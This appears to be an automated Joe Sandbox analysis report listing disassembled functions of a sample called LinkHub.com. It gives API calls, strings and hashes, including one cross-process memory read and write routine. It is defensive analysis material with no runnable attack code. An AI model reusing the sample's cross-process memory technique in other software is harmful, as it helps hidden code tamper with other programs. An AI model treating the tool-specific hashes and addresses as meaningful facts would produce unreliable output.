Instruction Fuzzy Hash: F5018134500714ABEB306F20DD4EBDE7BB8FB12705F010A99B597A10E1DBF0AA84DA90

Function 00BEDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BEDAD2

Part of subcall function 00BE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?), ref: 00BE2D4E
Part of subcall function 00BE2D38: GetLastError.KERNEL32(?,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?,?), ref: 00BE2D60

_free.LIBCMT ref: 00BEDAE4
_free.LIBCMT ref: 00BEDAF6
_free.LIBCMT ref: 00BEDB08
_free.LIBCMT ref: 00BEDB1A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 138dc510dfae131405a66d59dc9bad46947e5a07a4e59ef5c7c0e33d41d633d3
Instruction ID: 6fe8b37e1f084bcdfbb26bbceaca8f47494c7e482aca839143230b6d8c880691
Opcode Fuzzy Hash: 138dc510dfae131405a66d59dc9bad46947e5a07a4e59ef5c7c0e33d41d633d3
Instruction Fuzzy Hash: 75F01232544288AB8724EB6AED81E1E77EDEE04711B954CD5F10ED7541CB70FCC08695

Function 00BE2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE262E

Part of subcall function 00BE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?), ref: 00BE2D4E
Part of subcall function 00BE2D38: GetLastError.KERNEL32(?,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?,?), ref: 00BE2D60

_free.LIBCMT ref: 00BE2640
_free.LIBCMT ref: 00BE2653
_free.LIBCMT ref: 00BE2664
_free.LIBCMT ref: 00BE2675

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d4ece0d802ba72cafbc6ac8b45fa5c1ea8e56c0ea57291dfd68c3195a4d62c8e
Instruction ID: 7ecef8775e16dad6166b83ea0091360994b450136460fb0e49a9c05271785d62
Opcode Fuzzy Hash: d4ece0d802ba72cafbc6ac8b45fa5c1ea8e56c0ea57291dfd68c3195a4d62c8e
Instruction Fuzzy Hash: B5F0FEB48011659B8B12AF95FC05B4C3BECFF247623054A9AF919EA2B5C7310952AFC9

Function 00BE12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00BE1469
__freea.LIBCMT ref: 00BE1487

Part of subcall function 00BE18A7: _free.LIBCMT ref: 00BE18BF

Strings

a/p, xrefs: 00BE154E
am/pm, xrefs: 00BE14EA

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 77196bf6840688d6f6510a42ba98f87a7fb7288e82f310127b46aba624080e12
Instruction ID: 3a9c271e6a430d697eece0dddb33f36bd57473f6af8cb87b8440575cdf3663bb
Opcode Fuzzy Hash: 77196bf6840688d6f6510a42ba98f87a7fb7288e82f310127b46aba624080e12
Instruction Fuzzy Hash: DED104719102869ECB249F6EC8957FAB7F5FF55700F3849DAE902AB290D3359D80CB90

Function 00C13063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C12B1D,?,?,00000034,00000800,?,00000034), ref: 00C1BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C130AD

Part of subcall function 00C1BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C12B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00C1BDBF

Part of subcall function 00C1BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00C1BD1C
Part of subcall function 00C1BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C12AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C1BD2C
Part of subcall function 00C1BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C12AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C1BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C1311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C13167

Strings

@, xrefs: 00C1317F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b2818b9941d362f2c508be63901ac9158d41420ea68a1fad1319080d6529eac4
Instruction ID: b354cca9b9208a50bca45c66c8404ba1d601ac0b9aa098c22d1b4c594d567735
Opcode Fuzzy Hash: b2818b9941d362f2c508be63901ac9158d41420ea68a1fad1319080d6529eac4
Instruction Fuzzy Hash: DC411C76900218BFDB10EBA4CD81ADEB7B8EF46704F104095F955B7184DA706F85EB61

Function 00BE1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00BE1AD9
_free.LIBCMT ref: 00BE1BA4
_free.LIBCMT ref: 00BE1BAE

Strings

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com, xrefs: 00BE1AD0, 00BE1AD7, 00BE1B06, 00BE1B3E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
API String ID: 2506810119-1604394757
Opcode ID: f898cee79ec994312eed47c1f312919b8dbc0cc5d6d0797e4c0194c777e49f85
Instruction ID: 27e130129e16201aa64ce882dbb97c468e1a33070964b3856ad8b30292b07639
Opcode Fuzzy Hash: f898cee79ec994312eed47c1f312919b8dbc0cc5d6d0797e4c0194c777e49f85
Instruction Fuzzy Hash: 33317571A04258AFCB21DFAEDC85DAEBBFCEB85710B2045E6E80497211E7704E41D790

Function 00C1CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C1CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00C1CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C829C0,00DC6750), ref: 00C1CC40

Strings

0, xrefs: 00C1CB8A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 5b60ca3b8ff06581501491a970e0a9f25fad0ee770d8e67d466581f081c0384d
Instruction ID: 63dcb890befca70161c1769bea74cbd66aa68641760191a40a32ab44ad00bc4a
Opcode Fuzzy Hash: 5b60ca3b8ff06581501491a970e0a9f25fad0ee770d8e67d466581f081c0384d
Instruction Fuzzy Hash: EF41E1716443029FD720DF24D8C4BAABBE8BF86B14F04461DF4A997391CB30E980DB92

Function 00C44EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C4DCD0,00000000,?,?,?,?), ref: 00C44F48
GetWindowLongW.USER32 ref: 00C44F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C44F75

Strings

SysTreeView32, xrefs: 00C44F1A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: d40a7f5acaf76b8f11f7e935c27e888eee74e9b410d4a5efe48cf131d36ace40
Instruction ID: 8f092930c5095ae9cc83ab583dfbacc9ce76b3eb5c3f79108ac7edf76a03bff3
Opcode Fuzzy Hash: d40a7f5acaf76b8f11f7e935c27e888eee74e9b410d4a5efe48cf131d36ace40
Instruction Fuzzy Hash: 7931BC31210205AFEB249FB8CC45BEA7BA9FF08334F204724F979A21E0CB70AD549B50

Function 00C33AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C33DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C33AD4,?,?), ref: 00C33DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C33AD7
_wcslen.LIBCMT ref: 00C33AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00C33B63

Strings

255.255.255.255, xrefs: 00C33AF2, 00C33AF7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: d78b281ad9a46d7ec35197323c5ffad1f3493421e5080547f5e64520ad69a829
Instruction ID: 4999158b80bd66721a08634784d342692bd9626f74d061d05a8fa6dbbd9babf0
Opcode Fuzzy Hash: d78b281ad9a46d7ec35197323c5ffad1f3493421e5080547f5e64520ad69a829
Instruction Fuzzy Hash: D031B3396102819FCB10DF69C585EA9B7F0EF15328F248199E8268F3A2D771EF45CB60

Function 00C44954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C449DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C449F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C44A14

Strings

SysMonthCal32, xrefs: 00C449A7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: febcffd32598aba08e224b0dbe00dd668f36a9546cd8b4cce93cb84f1a5b8454
Instruction ID: cc10e1fab2f98b0dec0233b64d2a68d20bde8e77950bbbb395bad2afce41dd0c
Opcode Fuzzy Hash: febcffd32598aba08e224b0dbe00dd668f36a9546cd8b4cce93cb84f1a5b8454
Instruction Fuzzy Hash: 9321D132650219BBDF158F50CC46FEF3B69FF48714F110214FA156B1D0D6B1A855AB90

Function 00C450F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C451A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C451B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C451B8

Strings

msctls_updown32, xrefs: 00C45122

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c3ac37b93b5ded8958d43ad6b8a555a850449df913b8609552a7a6a7bf518e42
Instruction ID: f45eb7c338da21f711740aa81661bb8f5c2a25abaaa18d02cfe7758b1dfe0d84
Opcode Fuzzy Hash: c3ac37b93b5ded8958d43ad6b8a555a850449df913b8609552a7a6a7bf518e42
Instruction Fuzzy Hash: 62215CB5600609AFDB10DF68CC85EBB37ADFB5A364B040059FA119B362CA70EC15CBA0

Function 00C44253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C442DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C442EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C44312

Strings

Listbox, xrefs: 00C442AB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: ef98955ae1779fbdd5b2b278560f2a3c937ea0c684e7b36ddbe66328507cac21
Instruction ID: 9f2c7cbcc9c7a0833a7a2dd777d9464f9b5bd5a1620b261fdc6d404e4b2f8837
Opcode Fuzzy Hash: ef98955ae1779fbdd5b2b278560f2a3c937ea0c684e7b36ddbe66328507cac21
Instruction Fuzzy Hash: F821A432610118BBEF258F94CC85FBF376EFF89754F218114F9159B190CAB19C5187A0

Function 00C25439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C2544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C254A1
SetErrorMode.KERNEL32(00000000,?,?,00C4DCD0), ref: 00C25515

Strings

%lu, xrefs: 00C254B4

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: c93d9ed1e9e5eab01315cbeeeac22ed882f8ef7e0d28547180456e453dca3cd2
Instruction ID: 77f02d266f70aade83375da988945be15af751e40c99fcc441ef2715b981484e
Opcode Fuzzy Hash: c93d9ed1e9e5eab01315cbeeeac22ed882f8ef7e0d28547180456e453dca3cd2
Instruction Fuzzy Hash: 26316475A00109AFD710EF54C885EAE7BF8EF09304F1440A4F809DB252DB75EE45DB61

Function 00C44C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C44CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C44D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C44D0F

Strings

msctls_trackbar32, xrefs: 00C44CC4

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: aec2908d114b56e8ffd5a46958d7aeb2ff099d560eda98fc538635f23134502e
Instruction ID: 2f32b8cd01e7328d7053d492330b519fcc028f43b289d658ce51d0083fef1561
Opcode Fuzzy Hash: aec2908d114b56e8ffd5a46958d7aeb2ff099d560eda98fc538635f23134502e
Instruction Fuzzy Hash: 34110271240248BFEF205F69CC46FAB3BACFF89B65F210524FA55E60A0C671DC509B20

Function 00C1389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

Part of subcall function 00C136F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C13712
Part of subcall function 00C136F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C13723
Part of subcall function 00C136F4: GetCurrentThreadId.KERNEL32 ref: 00C1372A
Part of subcall function 00C136F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C13731

GetFocus.USER32 ref: 00C138C4

Part of subcall function 00C1373B: GetParent.USER32(00000000), ref: 00C13746

GetClassNameW.USER32(?,?,00000100), ref: 00C1390F
EnumChildWindows.USER32(?,00C13987), ref: 00C13937

Strings

%s%d, xrefs: 00C1394B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 37a3f0975d3b5cad4668098fbd63c821366ce3c8f0875379b4a9cf3fb2a97a55
Instruction ID: 9ff3b5b65430b612ae560bf665df7be42632c9cda0f364244038665b801febca
Opcode Fuzzy Hash: 37a3f0975d3b5cad4668098fbd63c821366ce3c8f0875379b4a9cf3fb2a97a55
Instruction Fuzzy Hash: 1411D5B5600249ABCF11BF749C85BFD77AEAF95304F0080B5BD099B292CE705A85EB60

Function 00C46321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C46360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C4638D
DrawMenuBar.USER32(?), ref: 00C4639C

Strings

0, xrefs: 00C4632E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 4ea7fcff1674a9aade7a86ad673c8a55ec576c667df8a8b09b47cadb753e5821
Instruction ID: a1f3430a5ae4ab65ba643bf0fe39db47f79924f5702bfbaccc0a2cfa053c66d9
Opcode Fuzzy Hash: 4ea7fcff1674a9aade7a86ad673c8a55ec576c667df8a8b09b47cadb753e5821
Instruction Fuzzy Hash: E5016D71514258AFDB11AF51DC84BAEBBB4FB46351F1080DAF84AD6160DF308A85EF22

Function 00C1096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13e83ad697149c24029dd78fa4544b26f585da4682c6d2c2239e0df1127bbf2
Instruction ID: f6c7c257074a043870db4e23f59af987b628653d1de122ada23124d9196c0a4c
Opcode Fuzzy Hash: a13e83ad697149c24029dd78fa4544b26f585da4682c6d2c2239e0df1127bbf2
Instruction Fuzzy Hash: 1AC13975A0020AEFDB04CF94C894AAEB7B5FF49704F208598E516EB251D771EEC1EB90

Function 00BE41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BE427E
__alldvrm.LIBCMT ref: 00BE447F
__alldvrm.LIBCMT ref: 00BE44A1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
